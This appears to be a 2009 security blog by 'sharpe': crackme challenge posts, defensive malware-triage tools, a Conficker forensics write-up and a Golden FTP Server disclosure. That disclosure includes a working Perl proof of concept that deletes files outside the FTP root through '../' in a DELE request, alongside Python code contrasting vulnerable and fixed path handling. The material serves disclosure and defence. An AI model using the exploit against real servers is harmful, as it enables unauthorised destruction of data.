blog.sat0ri.com

RCE Challenge – nine

by sharpe on Dec.20, 2009, under Reverse Code Engineering

My last reverseme was too easy due to the nature of the code de-obfuscation key length and usage. This time I have made some minor changes to precisely this portion of the code. Furthermore, I have added some anti-debugging stuff that I observed in a piece of malware. I hope you enjoy.

Here is a screen dump of this reverseme:

It can be downloaded here.


Golden FTP Server File Deletion Vulnerability

by sharpe on Nov.18, 2009, under Security, Vulnerabilities

I wrote to the vendor on the 11th of November but have heard nothing so here we are.

An input validation error exists in the way FTP "DELE" requests are handled: the path argument is not normalised against the configured root before the file is removed, so "../" sequences can be used to escape the FTP root and delete arbitrary files that the server's account has permission to delete.

Successful exploitation of the vulnerability requires that the "Enable full control" option is enabled for the share.

The vulnerability is confirmed in version 4.30 Free and Professional.

Here is a brief PoC:

use strict;
use warnings;
use Net::FTP;

# Target running Golden FTP Server 4.30; Debug => 1 echoes the FTP dialogue
my $ftp = Net::FTP->new("192.168.1.35", Debug => 1)
    or die "Cannot connect: $@";

# Anonymous is enough, provided "Enable full control" is set on the share
$ftp->login("anonymous", 'anonymous@local.host')
    or die "Cannot login: ", $ftp->message;

# The FTP root is, via the configuration, set to C:\ftp\public
$ftp->cwd("/public/")
    or die "Cannot cwd: ", $ftp->message;

# This deletes the file C:\bollocks.txt (the "../" is not stripped by the server)
$ftp->delete("../../bollocks.txt")
    or warn "DELE failed: ", $ftp->message;

$ftp->quit;
$ftp = undef;
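
To see where a bug like this lives on the server side, here is an added example of my own, not Golden FTP Server's code (whose internals I have not seen): it models a DELE handler once the flawed way and once the fixed way. It assumes, as in the PoC, that the virtual directory "/public" is served from C:\ftp\public; the share table, function names and error types are my own.

```python
import ntpath
import posixpath

# Constructed share table, modelled on the PoC: the virtual directory
# "/public" is served from C:\ftp\public. This is an assumption for the
# example, not Golden FTP Server's actual configuration format.
SHARES = {"public": r"C:\ftp\public"}


def _virtual_target(cwd, argument):
    """Join the DELE argument onto the client's current directory, as any
    server must do before it can map the request to a physical file."""
    if argument.startswith("/"):
        return argument
    return posixpath.join(cwd, argument)


def _split_share(virtual):
    """'/public/sub/x.txt' -> ('public', 'sub/x.txt')."""
    parts = virtual.strip("/").split("/", 1)
    return parts[0], (parts[1] if len(parts) > 1 else "")


def vulnerable_physical_path(cwd, argument):
    """Flawed DELE handling: the client-supplied remainder is glued onto the
    share's physical directory as-is, so '..' components survive and the OS
    walks out of the share when the file is opened or deleted."""
    share, rest = _split_share(_virtual_target(cwd, argument))
    if share not in SHARES:
        raise FileNotFoundError(share)
    physical = ntpath.join(SHARES[share], rest.replace("/", "\\"))
    # ntpath.normpath is what the filesystem effectively does with the '..'s
    return ntpath.normpath(physical)


def safe_physical_path(cwd, argument):
    """Hardened DELE handling: canonicalise the *virtual* path first, so that
    '..' can never carry the request above the share namespace, then map it
    to disk and verify the result is still inside the share's directory."""
    # Windows accepts '\' as a separator too, so fold it before normalising;
    # otherwise "..\\..\\x" would be one opaque component to posixpath.
    argument = argument.replace("\\", "/")
    virtual = posixpath.normpath(_virtual_target(cwd, argument))
    share, rest = _split_share(virtual)
    if share not in SHARES:
        # Either an unknown share, or a path that normalised up to the root:
        # "/public/../../bollocks.txt" becomes "/bollocks.txt" and lands here.
        raise PermissionError("refusing path outside any share: %r" % argument)
    root = ntpath.normpath(SHARES[share])
    physical = ntpath.normpath(ntpath.join(root, rest.replace("/", "\\")))
    # Belt and braces: a real server would also realpath() this to defeat
    # symlinks/junctions. The trailing separator stops C:\ftp\public from
    # "containing" C:\ftp\publicx.
    if physical != root and not physical.lower().startswith(root.lower() + "\\"):
        raise PermissionError("refusing path outside share: %r" % argument)
    return physical


def demo():
    """Run the PoC's request through both handlers and report the outcome."""
    cwd, arg = "/public/", "../../bollocks.txt"
    results = {"vulnerable": vulnerable_physical_path(cwd, arg)}
    try:
        results["safe"] = safe_physical_path(cwd, arg)
    except PermissionError as exc:
        results["safe"] = "rejected: %s" % exc
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print("%-10s -> %s" % (name, outcome))
```

The important ordering is normalise first, then map to disk, then verify containment: normalising the physical string alone is not enough, because by that point the client has already chosen which directory the '..' components are relative to.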

Ref:

  • http://www.exploit-db.com/exploits/10258
  • http://xforce.iss.net/xforce/xfdb/54497

FISH Version 0.0.3 Beta Released

by sharpe on Aug.31, 2009, under Malware, Security, Utilities

FISH version 0.0.3 beta, with numerous improvements, is now available for download. Expect to see tremendous performance increases in this release as well as many other improvements, including the following:

Version 0.0.3 (second public release):

  • This version is at least 30 times faster than version 0.0.2
  • Implemented a new hash function
  • Optimised the function used to iterate over files
  • Time stamps are now included in database files as well as reports
  • It is now possible to limit file selection to a specific size (calculating the digest of a 7GB vm image is a really bad idea)
  • Restructured database files
  • Restructured report files
  • Introduced more logging to ensure that the user knows exactly which files were skipped (if they are too big according to the configuration)

If you find any bugs or have any ideas for improvement, please don’t hesitate to let me know.

FISH can be downloaded here. This is still a beta release so use at your own risk.


Identifying Vulnerabilities in ActiveX Controls

by sharpe on Aug.08, 2009, under Reverse Code Engineering, Security

While many ActiveX components are slowly being replaced with technologies considered more secure and/or web-mature, many developers still utilise ActiveX controls as a quick way to push advanced functionality out to web browsers. ActiveX security is based on digital signatures: if you trust the source of the component, then it is deemed safe to run the control. That said, when the control is run, it runs like any other Win32 desktop application and has access to the same resources, unlike a Java applet, which executes inside a restricted environment known as a “sandbox” that limits what the applet has access to. Well, that’s how the sandbox works in theory at least. In other words, you had better trust the authors of the ActiveX component.

In this paper, I won’t be focussing on the ActiveX security model, but rather on the identification of vulnerabilities in the ActiveX control itself, not in the way the control interacts with its environment. This is an interesting topic, as the presence of such vulnerabilities could enable an attacker to compromise a user’s computer simply by guiding them to a malicious web site. In other words, no action on the part of the user beyond visiting the page is required for remote code execution.

This paper is currently being re-written and thus unavailable.

If you have any comments, please don’t hesitate to write to me.

“Default User” Temporary Internet File weirdness

by sharpe on Jul.27, 2009, under Malware, Security

The other day I was looking at a friend’s computer. I was browsing his user profile directory in search of something interesting to show him and came across something that I had never seen before: the Default User’s Temporary Internet Files directory was filled with temporary Internet files (hence its name :o ) as though this user had been using Internet Explorer to browse the Internet, which is not possible when using Windows normally. Furthermore, he mentioned that his anti-virus (Trend Micro OfficeScan, TM below) identified the file “C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\SN8PI1DA\raedwev[1].jpg” as WORM_DOWNAD.DAM. According to the file extension it was an image (JPG), but the content of the file appeared to be binary in nature. I uploaded the file to VirusTotal but the results came back blank.

A couple of hours later I came to the conclusion that another computer had probably attempted to infect his computer with the Conficker worm by exploiting the vulnerability described in MS08-067. This assumption was based on the presence of the mentioned file in the default user’s (Default User) Temporary Internet Files directory.

The default user profile is used as a template for new users and it is not possible to log on as this user. If its Temporary Internet Files directory does become populated with cache files, it may be because Internet Explorer, or more precisely its download and caching components, had at some point been executed with SYSTEM privileges (browse the Internet using Internet Explorer with SYSTEM privileges and you’ll see what I mean, which is a really bad idea). Usually, when a user uses Internet Explorer, it runs with the same privileges as that user. So if Internet Explorer, or something built on its components, is running with SYSTEM rights, that is unusual and therefore probably malicious.

Assuming that my friend’s computer is vulnerable to MS08-067 (it was), a successful exploitation attempt could (depending on the exploit payload) result in a new process with SYSTEM privileges. The Conficker worm (WORM_DOWNAD) spreads by exploiting MS08-067, and its payload then calls the URLDownloadToFileA() API in urlmon.dll, now with SYSTEM privileges, in order to download additional files (configurations, payloads, etc.). urlmon.dll is one of Internet Explorer’s core components and uses the same WinInet cache as the browser, so when this newly created SYSTEM process calls URLDownloadToFileA(), it is as if Internet Explorer itself were retrieving the file. This means that any file downloaded in this way is written to a Temporary Internet Files directory before reaching its final destination (typically the currently logged on user’s desktop); for the SYSTEM process on this machine, that cache turned out to be the Default User profile’s.

While the Conficker payload was being downloaded, my friend’s anti-virus was able to identify the malicious payload and thus interrupt the download process prior to its completion, which is what caused TM to issue the initial alert. Additionally, the reason TM identified the file as WORM_DOWNAD.DAM is due to the fact that the payload had not successfully/completely been downloaded and was thus damaged, hence the name issued by TM: WORM_DOWNAD.DAM (DAM for damaged).

If you see temporary Internet files in the Default User’s Temporary Internet Files directory, you may want to have a closer look. Hiding malicious payloads in TMP and JPG files (among others) is common practice for malware, so keep an eye out for these. Check out NASTI (below), which will help you identify the presence of such files.

I hope you found this interesting.

Special anniversary greets to divine dinne.


NASTI – Nickos And Sharpes Tool for Identifying potentially malicious files

by sharpe on Jun.12, 2009, under Malware, Security, Utilities

Recently, whilst analysing the PSP2-BBB banker trojan, I discovered that this particular trojan, as well as many others, downloaded malicious payloads to the currently logged on user’s “Temp” and “Temporary Internet Files” directories, located in the “Local Settings” directory on a Win32 system, and saved them as temp files with a random four-character name plus the .TMP extension (e.g. 23D4.TMP). Knowing this, it would be nice to be able to identify executable files with inconsistent file extensions (e.g. executable files with .TMP as the file extension), as this would aid in the identification of potentially malicious files and thus speed up the analysis.

For the sake of illustration, if we look at one of the examined TMP files in a hex editor (presented in the following screen dump), we can clearly see that it is a valid Portable Executable (PE) file (a PE file starts with the “MZ” DOS header, and the e_lfanew field at offset 0x3C points at the “PE\0\0” signature):

Hex Dump

NASTI’s configuration enables the user to specify signatures for known file types and to associate one or more file extensions with each signature. When NASTI runs, it compares the current file’s extension with those associated with each signature in the configuration file. If the extension is not one of them, then that signature should not be present in the file; if it is, the file is flagged.

Here is a screen dump of NASTI in the middle of a scan:

NASTI can be downloaded here. This is a beta release so use at your own risk.
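
The check NASTI performs, and the one you would run over a suspicious Default User cache directory such as the one in the Conficker post above, fits in a short script. The following is an added example of my own and not NASTI's code: it carries a small signature table, flags files whose content matches a signature but whose extension is not one associated with it, and builds a constructed sample directory (with a minimal fake PE image, not a real binary) so that it runs offline. The signature table, the directory layout and all names are assumptions for illustration.

```python
import os
import struct
import tempfile


def _is_pe(head):
    # "MZ" DOS stub, and the e_lfanew pointer at offset 0x3C must land on "PE\0\0"
    if len(head) < 0x40 or head[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", head, 0x3C)[0]
    return head[e_lfanew:e_lfanew + 4] == b"PE\0\0"


# Constructed signature table in the spirit of NASTI's configuration:
# (label, extensions that legitimately carry this content, header predicate).
SIGNATURES = [
    ("PE executable", {".exe", ".dll", ".sys", ".scr", ".ocx", ".cpl"}, _is_pe),
    ("JPEG image", {".jpg", ".jpeg"}, lambda h: h[:3] == b"\xff\xd8\xff"),
    ("PNG image", {".png"}, lambda h: h[:8] == b"\x89PNG\r\n\x1a\n"),
    ("ZIP archive", {".zip", ".jar", ".docx", ".xlsx"}, lambda h: h[:4] == b"PK\x03\x04"),
    ("PDF document", {".pdf"}, lambda h: h[:5] == b"%PDF-"),
]

HEAD_BYTES = 4096  # enough for every predicate above, including a sane e_lfanew


def check_file(path):
    """Return the label of a signature that matches the file's content while the
    file's extension is not one associated with that signature; else None."""
    with open(path, "rb") as fh:
        head = fh.read(HEAD_BYTES)
    ext = os.path.splitext(path)[1].lower()
    for label, exts, matches in SIGNATURES:
        if matches(head) and ext not in exts:
            return label
    return None


def scan_dir(root):
    """Walk root and return {path: label} for every mismatching file."""
    flagged = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                label = check_file(path)
            except OSError:
                continue  # locked or unreadable; a real tool would log this
            if label:
                flagged[path] = label
    return flagged


def scan_names(root):
    """Sorted (file name, label) pairs for the flagged files, for quick review."""
    return sorted((os.path.basename(p), label) for p, label in scan_dir(root).items())


def fake_pe():
    """Minimal constructed bytes that pass _is_pe: an MZ header whose
    e_lfanew points at a PE signature. Test data, not an executable."""
    buf = bytearray(0x40 + 4)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)
    buf[0x40:0x44] = b"PE\0\0"
    return bytes(buf)


def build_sample_dir():
    """Constructed directory mimicking a Temporary Internet Files cache."""
    root = tempfile.mkdtemp(prefix="tif-")
    sub = os.path.join(root, "Content.IE5", "SN8PI1DA")
    os.makedirs(sub)
    samples = {
        os.path.join(sub, "raedwev[1].jpg"): fake_pe(),                      # PE hiding as .jpg
        os.path.join(root, "23D4.TMP"): fake_pe(),                           # PE hiding as .TMP
        os.path.join(sub, "logo[1].jpg"): b"\xff\xd8\xff\xe0" + b"\0" * 32,  # genuine JPEG header
        os.path.join(root, "notes.txt"): b"just text\n",                     # matches nothing
        os.path.join(root, "setup.exe"): fake_pe(),                          # PE with a PE extension
    }
    for path, data in samples.items():
        with open(path, "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_dir()
    for name, label in scan_names(target):
        print("FLAGGED %-14s %s" % (label, name))
```

Point it at a real cache (for example the Default User profile's Temporary Internet Files directory on an XP box) by passing the path as the first argument; with no argument it scans the constructed sample and flags only the two PE files carrying .jpg and .TMP extensions.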


IFAU – Index Frequency Analysis Utility

by sharpe on Jun.04, 2009, under Reverse Code Engineering, Utilities

IFAU is a simple utility that was written to analyse binary files and count how many times each byte value is present in a given file. This is useful when attempting to identify frequently used op codes; a byte histogram is also a quick way to spot packed or encrypted regions, whose distribution is close to flat. The results are written to a hash which is dumped to an XML report as well as a graph upon completion.

A sample XML report might resemble the following:

<?xml version="1.0" encoding="iso-8859-1" ?>
<bytes count="10">
<byte value="11" count="1" />
<byte value="23" count="1" />
<byte value="32" count="1" />
<byte value="38" count="1" />
<byte value="4a" count="1" />
<byte value="69" count="1" />
<byte value="87" count="2" />
<byte value="ad" count="1" />
<byte value="df" count="1" />
<byte value="fa" count="1" />
</bytes>

As mentioned above, this information is also presented in a graph. A large number of different bytes can result in the graph being difficult to read, which is why the previously presented XML report is also generated.
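
As an added illustration (my own code, not IFAU's), here is the core of such a tool in Python: it builds the byte histogram, writes it out in the same XML layout as the report above and, going a little beyond IFAU, derives the Shannon entropy from the same histogram, since a near-flat distribution is the usual sign of packed or encrypted data. The sample bytes are constructed to reproduce the report above; treating the count attribute on <bytes> as the number of distinct byte values is my reading of that sample.

```python
import math
from collections import Counter

# Constructed input: eleven bytes that reproduce the sample report above
# (0x87 occurs twice, the other nine values once).
SAMPLE = bytes.fromhex("11 23 32 38 4a 69 87 87 ad df fa")


def byte_frequencies(data):
    """Map each byte value present in data to its number of occurrences."""
    return Counter(data)


def top_bytes(freq, n=5):
    """The n most frequent byte values as (value, count), most frequent first.
    Handy for eyeballing likely opcodes, padding or XOR keys."""
    return freq.most_common(n)


def entropy_bits(freq):
    """Shannon entropy of the byte distribution: 0.0 (constant) to 8.0 (flat)."""
    total = sum(freq.values())
    if total == 0:
        return 0.0
    return -sum((c / total) * math.log2(c / total) for c in freq.values())


def to_xml(freq):
    """Render the histogram in the report layout shown above, sorted by value."""
    lines = ['<?xml version="1.0" encoding="iso-8859-1" ?>',
             '<bytes count="%d">' % len(freq)]
    for value in sorted(freq):
        lines.append('<byte value="%02x" count="%d" />' % (value, freq[value]))
    lines.append("</bytes>")
    return "\n".join(lines) + "\n"


def analyse_file(path):
    """Read a file and return (histogram, entropy in bits per byte, xml report)."""
    with open(path, "rb") as fh:
        data = fh.read()
    freq = byte_frequencies(data)
    return freq, entropy_bits(freq), to_xml(freq)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        freq, ent, xml = analyse_file(sys.argv[1])
    else:
        freq = byte_frequencies(SAMPLE)
        ent, xml = entropy_bits(freq), to_xml(freq)
    sys.stdout.write(xml)
    print("entropy: %.2f bits/byte; top bytes: %s" % (ent, top_bytes(freq)))
```

Plain x86 code typically lands well below 8 bits per byte, so an entropy close to 8 over a whole section is worth a look before spending time on opcode statistics that a packer would make meaningless anyway.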

As an illustration, a graph for a small binary file might resemble the following:

IFAU can be downloaded here. This is a beta release so use at your own risk.


RCE Challenge – eight

by sharpe on Jun.04, 2009, under Reverse Code Engineering

Based on all the comments I have received on the previous two unlockmes (six and seven), I have created a new and improved version, which I hope will offer more of a challenge than its predecessors. If you manage to find a valid Unlock Code, type it in and press the Unlock Code button. If it is correct, you should be able to find the hidden secret.

Here is a screen dump of this unlockme challenge:

It can be downloaded here.


RCE Challenge – seven

by sharpe on Jun.03, 2009, under Reverse Code Engineering

Here is my latest crackme, which is no longer a keygenme. I decided to drop that functionality as I feel that finding a valid Unlock Code for the code obfuscation is the only real challenge. If you manage to find a valid Unlock Code, type it in and press the Unlock Code button. If it is correct, things should go well when you press the Check button.

Here is a screen dump of this unlockme challenge:

It can be downloaded here.


RCE Challenge – six

by sharpe on May.25, 2009, under Reverse Code Engineering

All sorts of stuff is obfuscated here, including the serial-generation code as well as other “code” that may be of interest. I won’t say much more. After the unlock code has been found, type it in and it will de-obfuscate the serial-generation code, as with the two other challenges. If you enter an invalid code, the crackme will crash, as the de-obfuscation routine will contain garbage instruction sequences. Once this bit is complete, it should be straightforward.

Here is a screen dump of this keygenme:

It can be downloaded here.

